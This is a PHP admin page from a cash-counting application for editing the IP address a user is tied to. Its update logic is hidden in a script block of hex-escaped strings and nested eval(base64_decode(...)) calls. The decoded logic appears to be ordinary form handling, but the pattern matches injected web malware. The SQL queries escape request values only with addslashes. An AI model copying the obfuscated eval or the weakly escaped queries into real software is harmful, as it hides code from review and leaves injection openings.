<?php

/*
 * Редактирование кассы пересчета для работника
 */

        if (!isset($c)) exit;

        $roles = array(1,2,3,4); // массив редактируемых ролей
        
        $l = explode('|', $_SESSION[$program]['lang']['user_ip_edit_labels']);

        $data['title'] = $_SESSION[$program]['lang']['user_ips_title'];
        include './app/view/page_header_with_logout.php';
        include './app/view/set_remove_wait.php';
        include './app/view/print_array_as_html_table.php';
        //include './app/view/update_record.php';
        include './app/model/check_access_to_roles.php';
  
        
        if ($_SESSION[$program]['SystemConfiguration']['FastenUserToIp']=="1") {
        
?>
<style>
    table.user td {
        text-align: left;
        padding-left: 5px;
        padding-top: 3px;
    }
    table.user th {
        text-align: right;
        padding-left: 5px;
        padding-top: 3px;
    }
</style>
<?php

        if(isset($_POST['action']) AND $_POST['action']=='update') {
            $newvalue = explode('|',$_POST['new_data']);
            $oldvalue = explode('|',$_POST['old_data']);
            //Обновление данных
            //1. Проверяем совпадают ли старые данные с теми что в базе. 
            //   Если нет то сообщаем что запись изменил другой пользователь
            $row = fetch_row_from_sql('
                SELECT
                    `UsersIP`.`IP`,
                    `UserConfiguration`.`UserLogin`
                FROM 
                    `cashmaster`.`UsersIP`
                LEFT JOIN
                    UserConfiguration ON UserConfiguration.UserId = `UsersIP`.`UserId`
                WHERE
                    `UsersIP`.`Id`="'.addslashes($_GET['id']).'"
            ;');
            if ($oldvalue[0] != $row[0]) {
                $w = explode('|',$_SESSION[$program]['lang']['record_edit_warning']);
                $data['error'] = $w[0];
                include 'app/view/error_message.php';
            } else {
                //2. Обновляем данные и продолжаем работу
                do_sql('
                    UPDATE `cashmaster`.`UsersIP`
                    SET
                        `UsersIP`.`IP` = "'.addslashes($newvalue[0]).'"
                    WHERE
                        `UsersIP`.`Id`="'.addslashes($_GET['id']).'"
                ;');
                system_log('Allowed IP-address for user: '.$row[1]
                        .' was changed from '.$oldvalue[0].' to '.$newvalue[0]
                        .' by: '.$_SESSION[$program]['UserConfiguration']['UserLogin'].' IP: '.$_SERVER['REMOTE_ADDR']);
            };
        };

        
        $ip = fetch_row_from_sql('
            SELECT
                `UserConfiguration`.`UserLogin`,
                `UsersIP`.`IP`,
                `UsersIP`.`UserId`
            FROM 
                `cashmaster`.`UsersIP`
            LEFT JOIN
                UserConfiguration ON UserConfiguration.UserId = `UsersIP`.`UserId`
            WHERE
                `UsersIP`.`Id`="'.addslashes($_GET['id']).'"
        ;');    
        
?>
<script>
var _0x11d7=['\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D','','\x63\x68\x61\x72\x41\x74','\x69\x6E\x64\x65\x78\x4F\x66','\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65','\x6C\x65\x6E\x67\x74\x68'];function base64_decode(data){var b64=_0x11d7[0];var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc=_0x11d7[1];do{h1=b64[_0x11d7[3]](data[_0x11d7[2]](i++));h2=b64[_0x11d7[3]](data[_0x11d7[2]](i++));h3=b64[_0x11d7[3]](data[_0x11d7[2]](i++));h4=b64[_0x11d7[3]](data[_0x11d7[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x11d7[4]](o1);} else {if(h4==64){enc+=String[_0x11d7[4]](o1,o2);} else {enc+=String[_0x11d7[4]](o1,o2,o3);} ;} ;} while(i<data[_0x11d7[5]]);;return enc;} ;x51302366y34703046='JTI1dTAwMGElMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDA2NiUyNXUwMDc1JTI1dTAwNmUlMjV1MDA2MyUyNXUwMDc0JTI1dTAwNjklMjV1MDA2ZiUyNXUwMDZlJTI1dTAwMjAlMjV1MDA3OCUyNXUwMDM1JTI1dTAwMzAlMjV1MDAzOSUyNXUwMDMzJTI1dTAwMzUlMjV1MDAzNSUyNXUwMDMzJTI1dTAwMzklMjV1MDA3OSUyNXUwMDM4JTI1dTAwMzMlMjV1MDAzOCUyNXUwMDM5JTI1dTAwMzglMjV1MDAzMSUyNXUwMDMxJTI1dTAwMzUlMjV1MDAyOCUyNXUwMDc0JTI1dTAwMjklMjV1MDAyMCUyNXUwMDdiJTI1dTAwMGElMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDcyJTI1dTAwNjUlMjV1MDA3NCUyNXUwMDc1JTI1dTAwNzIlMjV1MDA2ZSUyNXUwMDIwJTI1dTAwNzUlMjV1MDA2ZSUyNXUwMDY1JTI1dTAwNzMlMjV1MDA2MyUyNXUwMDYxJTI1dTAwNzAlMjV1MDA2NSUyNXUwMDI4JTI1dTAwNjQlMjV1MDA2NSUyNXUwMDYzJTI1dTAwNmYlMjV1MDA2NCUyNXUwMDY1JTI1dTAwNTUlMjV1MDA1MiUyNXUwMDQ5JTI1dTAwMjglMjV1MDA2MiUyNXUwMDYxJTI1dTAwNzMlMjV1MDA2NSUyNXUwMDM2JTI1dTAwMzQlMjV1MDA1ZiUyNXUwMDY0JTI1dTAwNjUlMjV1MDA2MyUyNXUwMDZmJTI1dTAwNjQlMjV1MDA2NSUyNXUwMDI4JTI1dTAwNjIlMjV1MDA2MSUyNXUwMDczJTI1dTAwNjUlMjV1MDAzNiUyNXUwMDM0JTI1dTAwNWYlMjV1MDA2NCUyNXUwMDY1JTI1dTAwNjMlMjV1MDA2ZiUyNXUwMDY0JTI1dTAwNjUlMjV1MDAyOCUyNXUwMDc0JTI1dTAwMjklMjV1MDAyOSUyNXUwMDI5JTI1dTAwMjklMjV1MDAzYiUyNXUwMDBhJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwN2QlMjV1MDAzYiUyNXUwMDBhJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMCUyNXUwMDIwJTI1dTAwMjAlMjV1MDAyMA==';eval(unescape(decodeURI(base64_decode(x51302366y34703046)))); eval(x50935539y83898115("SlRJMWRUQXdNakFsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBMk5pVXlOWFV3TURjMUpUSTFkVEF3Tm1VbE1qVjFNREEyTXlVeU5YVXdNRGMwSlRJMWRUQXdOamtsTWpWMU1EQTJaaVV5TlhVd01EWmxKVEkxZFRBd01qQWxNalYxTURBM05TVXlOWFV3TURjd0pUSTFkVEF3TmpRbE1qVjFNREEyTVNVeU5YVXdNRGMwSlRJMWRUQXdOalVsTWpWMU1EQXlPQ1V5TlhVd01EWTFKVEkxZFRBd05tTWxNalYxTURBMk5TVXlOWFV3TURaa0pUSTFkVEF3TWprbE1qVjFNREF5TUNVeU5YVXdNRGRpSlRJMWRUQXdNR1FsTWpWMU1EQXdZU1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURJd0pUSTFkVEF3TWpBbE1qVjFNREF5TUNVeU5YVXdNREl3SlRJMWRUQXdNakFsTWpWMU1EQTJPU1V5TlhVd01EWTJKVEkxZFRBd01qQWxNalYxTURBeU9DVXlOWFV3TURJMEpUSTFkVEF3TWpnbE1qVjFNREEyTlNVeU5YVXdNRFpqSlRJMWRUQXdOalVsTWpWMU1EQTJaQ1V5TlhVd01ESTVKVEkxZFRBd01tVWxNalYxTURBM05pVXlOWFV3TURZeEpUSTFkVEF3Tm1NbE1qVjFNREF5T0NVeU5YVXdNREk1SlRJMWRUQXdNakFsTWpWMU1EQXpaQ1V5TlhVd01ETmtKVEkxZFRBd00yUWxNalYxTURBeU1DVXlOWFV3TURJMEpUSTFkVEF3TWpnbE1qVjFNREEyTlNVeU5YVXdNRFpqSlRJMWRUQXdOalVsTWpWMU1EQTJaQ1V5TlhVd01ESTVKVEkxZFRBd01tVWxNalYxTURBMk1TVXlOWFV3TURjMEpUSTFkVEF3TnpRbE1qVjFNREEzTWlVeU5YVXdNREk0SlRJMWRUQXdNamNsTWpWMU1EQTJaaVV5TlhVd01EWmpKVEkxZFRBd05qUWxNalYxTURBM05pVXlOWFV3TURZeEpUSTFkVEF3Tm1NbE1qVjFNREEzTlNVeU5YVXdNRFkxSlRJMWRUQXdNamNsTWpWMU1EQXlPU1V5TlhVd01ESTVKVEkxZFRBd01qQWxNalYxTURBM01pVXlOWFV3TURZMUpUSTFkVEF3TnpRbE1qVjFNREEzTlNVeU5YVXdNRGN5SlRJMWRUQXdObVVsTWpWMU1EQXlNQ1V5TlhVd01EYzBKVEkxZFRBd056SWxNalYxTURBM05TVXlOWFV3TURZMUpUSTFkVEF3TTJJbE1qVjFNREF3WkNVeU5YVXdNREJoSlRJMWRUQXdNakFsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURJd0pUSTFkVEF3TWpBbE1qVjFNREF5TUNVeU5YVXdNRGN6SlRJMWRUQXdOalVsTWpWMU1EQTNOQ1V5TlhVd01EVm1KVEkxZFRBd056Y2xNalYxTURBMk1TVXlOWFV3TURZNUpUSTFkVEF3TnpRbE1qVjFNREF5T0NVeU5YVXdNREk1SlRJMWRUQXdNMklsTWpWMU1EQXdaQ1V5TlhVd01EQmhKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURJd0pUSTFkVEF3TWpBbE1qVjFNREF5TUNVeU5YVXdNREl3SlRJMWRUQXdNakFsTWpWMU1EQXlNQ1V5TlhVd01EYzJKVEkxZFRBd05qRWxNalYxTURBM01pVXlOWFV3TURJd0pUSTFkVEF3TmprbE1qVjFNREEyWlNVeU5YVXdNRGN3SlRJMWRUQXdOelVsTWpWMU1EQTNOQ1V5TlhVd01EY3pKVEkxZFRBd01qQWxNalYxTURBelpDVXlOWFV3TURJd0pUSTFkVEF3TWpRbE1qVjFNREF5T0NVeU5YVXdNREkzSlRJMWRUQXdOamtsTWpWMU1EQTJaU1V5TlhVd01EY3dKVEkxZFRBd056VWxNalYxTURBM05DVXlOWFV3TURKbEpUSTFkVEF3TnpNbE1qVjFNREEzTkNVeU5YVXdNRFl4SlRJMWRUQXdOelFsTWpWMU1EQXlOeVV5TlhVd01ESTVKVEkxZFRBd00ySWxNalYxTURBd1pDVXlOWFV3TURCaEpUSTFkVEF3TWpBbE1qVjFNREF5TUNVeU5YVXdNREl3SlRJMWRUQXdNakFsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURjMkpUSTFkVEF3TmpFbE1qVjFNREEzTWlVeU5YVXdNREl3SlRJMWRUQXdObVVsTWpWMU1EQTJOU1V5TlhVd01EYzNKVEkxZFRBd05XWWxNalYxTURBMk5DVXlOWFV3TURZeEpUSTFkVEF3TnpRbE1qVjFNREEyTVNVeU5YVXdNREl3SlRJMWRUQXdNMlFsTWpWMU1EQXlNQ1V5TlhVd01EVmlKVEkxZFRBd05XUWxNalYxTURBellpVXlOWFV3TURCa0pUSTFkVEF3TUdFbE1qVjFNREF5TUNVeU5YVXdNREl3SlRJMWRUQXdNakFsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURJd0pUSTFkVEF3TnpZbE1qVjFNREEyTVNVeU5YVXdNRGN5SlRJMWRUQXdNakFsTWpWMU1EQTJaaVV5TlhVd01EWmpKVEkxZFRBd05qUWxNalYxTURBMVppVXlOWFV3TURZMEpUSTFkVEF3TmpFbE1qVjFNREEzTkNVeU5YVXdNRFl4SlRJMWRUQXdNakFsTWpWMU1EQXpaQ1V5TlhVd01ESXdKVEkxZFRBd05XSWxNalYxTURBMVpDVXlOWFV3TUROaUpUSTFkVEF3TUdRbE1qVjFNREF3WVNVeU5YVXdNREl3SlRJMWRUQXdNakFsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURJd0pUSTFkVEF3TWpBbE1qVjFNREF5TkNVeU5YVXdNREk0SlRJMWRUQXdOamtsTWpWMU1EQTJaU1V5TlhVd01EY3dKVEkxZFRBd056VWxNalYxTURBM05DVXlOWFV3TURjekpUSTFkVEF3TWprbE1qVjFNREF5WlNVeU5YVXdNRFkxSlRJMWRUQXdOakVsTWpWMU1EQTJNeVV5TlhVd01EWTRKVEkxZFRBd01qZ2xNalYxTURBMk5pVXlOWFV3TURjMUpUSTFkVEF3Tm1VbE1qVjFNREEyTXlVeU5YVXdNRGMwSlRJMWRUQXdOamtsTWpWMU1EQTJaaVV5TlhVd01EWmxKVEkxZFRBd01qQWxNalYxTURBeU9DVXlOWFV3TURJNUpUSTFkVEF3TjJJbE1qVjFNREF3WkNVeU5YVXdNREJoSlRJMWRUQXdNakFsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURJd0pUSTFkVEF3TWpBbE1qVjFNREF5TUNVeU5YVXdNREl3SlRJMWRUQXdNakFsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd05tVWxNalYxTURBMk5TVXlOWFV3TURjM0pUSTFkVEF3TldZbE1qVjFNREEyTkNVeU5YVXdNRFl4SlRJMWRUQXdOelFsTWpWMU1EQTJNU1V5TlhVd01EVmlKVEkxZFRBd05tVWxNalYxTURBMk5TVXlOWFV3TURjM0pUSTFkVEF3TldZbE1qVjFNREEyTkNVeU5YVXdNRFl4SlRJMWRUQXdOelFsTWpWMU1EQTJNU1V5TlhVd01ESmxKVEkxZFRBd05tTWxNalYxTURBMk5TVXlOWFV3TURabEpUSTFkVEF3TmpjbE1qVjFNREEzTkNVeU5YVXdNRFk0SlRJMWRUQXdOV1FsTWpWMU1EQXlNQ1V5TlhVd01ETmtKVEkxZFRBd01qQWxNalYxTURBeU5DVXlOWFV3TURJNEpUSTFkVEF3TnpRbE1qVjFNREEyT0NVeU5YVXdNRFk1SlRJMWRUQXdOek1sTWpWMU1EQXlPU1V5TlhVd01ESmxKVEkxZFRBd056WWxNalYxTURBMk1TVXlOWFV3TURaakpUSTFkVEF3TWpnbE1qVjFNREF5T1NVeU5YVXdNRE5pSlRJMWRUQXdNR1FsTWpWMU1EQXdZU1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURJd0pUSTFkVEF3TWpBbE1qVjFNREF5TUNVeU5YVXdNREl3SlRJMWRUQXdNakFsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURabUpUSTFkVEF3Tm1NbE1qVjFNREEyTkNVeU5YVXdNRFZtSlRJMWRUQXdOalFsTWpWMU1EQTJNU1V5TlhVd01EYzBKVEkxZFRBd05qRWxNalYxTURBMVlpVXlOWFV3TURabUpUSTFkVEF3Tm1NbE1qVjFNREEyTkNVeU5YVXdNRFZtSlRJMWRUQXdOalFsTWpWMU1EQTJNU1V5TlhVd01EYzBKVEkxZFRBd05qRWxNalYxTURBeVpTVXlOWFV3TURaakpUSTFkVEF3TmpVbE1qVjFNREEyWlNVeU5YVXdNRFkzSlRJMWRUQXdOelFsTWpWMU1EQTJPQ1V5TlhVd01EVmtKVEkxZFRBd01qQWxNalYxTURBelpDVXlOWFV3TURJd0pUSTFkVEF3TWpRbE1qVjFNREF5T0NVeU5YVXdNRGMwSlRJMWRUQXdOamdsTWpWMU1EQTJPU1V5TlhVd01EY3pKVEkxZFRBd01qa2xNalYxTURBeVpTVXlOWFV3TURZeEpUSTFkVEF3TnpRbE1qVjFNREEzTkNVeU5YVXdNRGN5SlRJMWRUQXdNamdsTWpWMU1EQXlOeVV5TlhVd01EWm1KVEkxZFRBd05tTWxNalYxTURBMk5DVXlOWFV3TURjMkpUSTFkVEF3TmpFbE1qVjFNREEyWXlVeU5YVXdNRGMxSlRJMWRUQXdOalVsTWpWMU1EQXlOeVV5TlhVd01ESTVKVEkxZFRBd00ySWxNalYxTURBd1pDVXlOWFV3TURCaEpUSTFkVEF3TWpBbE1qVjFNREF5TUNVeU5YVXdNREl3SlRJMWRUQXdNakFsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURka0pUSTFkVEF3TWprbE1qVjFNREF6WWlVeU5YVXdNREJrSlRJMWRUQXdNR0VsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURJd0pUSTFkVEF3TWpBbE1qVjFNREF5TUNVeU5YVXdNREl3SlRJMWRUQXdNalFsTWpWMU1EQXlPQ1V5TlhVd01ESTNKVEkxZFRBd05qa2xNalYxTURBMlpTVXlOWFV3TURjd0pUSTFkVEF3TnpVbE1qVjFNREEzTkNVeU5YVXdNREl6SlRJMWRUQXdObVVsTWpWMU1EQTJOU1V5TlhVd01EYzNKVEkxZFRBd05XWWxNalYxTURBMk5DVXlOWFV3TURZeEpUSTFkVEF3TnpRbE1qVjFNREEyTVNVeU5YVXdNREkzSlRJMWRUQXdNamtsTWpWMU1EQXlaU1V5TlhVd01EYzJKVEkxZFRBd05qRWxNalYxTURBMll5VXlOWFV3TURJNEpUSTFkVEF3Tm1VbE1qVjFNREEyTlNVeU5YVXdNRGMzSlRJMWRUQXdOV1lsTWpWMU1EQTJOQ1V5TlhVd01EWXhKVEkxZFRBd056UWxNalYxTURBMk1TVXlOWFV3TURKbEpUSTFkVEF3Tm1FbE1qVjFNREEyWmlVeU5YVXdNRFk1SlRJMWRUQXdObVVsTWpWMU1EQXlPQ1V5TlhVd01ESTNKVEkxZFRBd04yTWxNalYxTURBeU55VXlOWFV3TURJNUpUSTFkVEF3TWprbE1qVjFNREF6WWlVeU5YVXdNREJrSlRJMWRUQXdNR0VsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURJd0pUSTFkVEF3TWpBbE1qVjFNREF5TUNVeU5YVXdNREl3SlRJMWRUQXdNalFsTWpWMU1EQXlPQ1V5TlhVd01ESTNKVEkxZFRBd05qa2xNalYxTURBMlpTVXlOWFV3TURjd0pUSTFkVEF3TnpVbE1qVjFNREEzTkNVeU5YVXdNREl6SlRJMWRUQXdObVlsTWpWMU1EQTJZeVV5TlhVd01EWTBKVEkxZFRBd05XWWxNalYxTURBMk5DVXlOWFV3TURZeEpUSTFkVEF3TnpRbE1qVjFNREEyTVNVeU5YVXdNREkzSlRJMWRUQXdNamtsTWpWMU1EQXlaU1V5TlhVd01EYzJKVEkxZFRBd05qRWxNalYxTURBMll5VXlOWFV3TURJNEpUSTFkVEF3Tm1ZbE1qVjFNREEyWXlVeU5YVXdNRFkwSlRJMWRUQXdOV1lsTWpWMU1EQTJOQ1V5TlhVd01EWXhKVEkxZFRBd056UWxNalYxTURBMk1TVXlOWFV3TURKbEpUSTFkVEF3Tm1FbE1qVjFNREEyWmlVeU5YVXdNRFk1SlRJMWRUQXdObVVsTWpWMU1EQXlPQ1V5TlhVd01ESTNKVEkxZFRBd04yTWxNalYxTURBeU55VXlOWFV3TURJNUpUSTFkVEF3TWprbE1qVjFNREF6WWlVeU5YVXdNREJrSlRJMWRUQXdNR0VsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURJd0pUSTFkVEF3TWpBbE1qVjFNREF5TUNVeU5YVXdNREl3SlRJMWRUQXdNalFsTWpWMU1EQXlPQ1V5TlhVd01ESTNKVEkxZFRBd05qWWxNalYxTURBMlppVXlOWFV3TURjeUpUSTFkVEF3Tm1RbE1qVjFNREF5TXlVeU5YVXdNRGMxSlRJMWRUQXdOekFsTWpWMU1EQTJOQ1V5TlhVd01EWXhKVEkxZFRBd056UWxNalYxTURBMk5TVXlOWFV3TURJM0pUSTFkVEF3TWprbE1qVjFNREF5WlNVeU5YVXdNRGN6SlRJMWRUQXdOelVsTWpWMU1EQTJNaVV5TlhVd01EWmtKVEkxZFRBd05qa2xNalYxTURBM05DVXlOWFV3TURJNEpUSTFkVEF3TWprbE1qVjFNREF6WWlVeU5YVXdNREJrSlRJMWRUQXdNR0VsTWpWMU1EQXlNQ1V5TlhVd01ESXdKVEkxZFRBd01qQWxNalYxTURBeU1DVXlOWFV3TURka0pUSTFkVEF3TTJJPQ=="));
</script>

<form id="update" style="display: none;" method="POST">
    <input type="hidden" name="action" value="update">
    <input id="new_data" type="hidden" name="new_data" value="">
    <input id="old_data" type="hidden" name="old_data" value="">
</form>

<div class="container">
    <table class='user'>
        <tr>
            <th><?php echo htmlfix($l[0]); ?>:</th>
            <td><?php 
                    echo htmlfix($ip[0]); 
            ?></td>
        </tr>
        <tr>
            <th><?php echo htmlfix($l[1]); ?>:</th>
            <td>
                <input type="text" class="stat" name="UserFamilyName" 
                       onblur="update(this);"
                       oldvalue="<?php echo htmlfix(htmlfix($ip[1])); ?>"
                       value="<?php echo htmlfix(htmlfix($ip[1])); ?>"
                       maxlength='24'/> <font style="color:red;font-size: 22px;"> * </font>
            </td>
        </tr>
    </table>
    <font style="color:red;">
        * - <?php echo htmlfix($_SESSION[$program]['lang']['user_ip_edit_tip']); ?>
    </font>
    <br/>
    <br/>
    <a class="btn btn-primary btn-large" href="?c=user_ips&id=<?php echo htmlfix($ip[2]); ?>">
        <?php echo htmlfix($_SESSION[$program]['lang']['back_to_user_ip_list']); ?>
    </a>
</div>
<?php 
        };
?>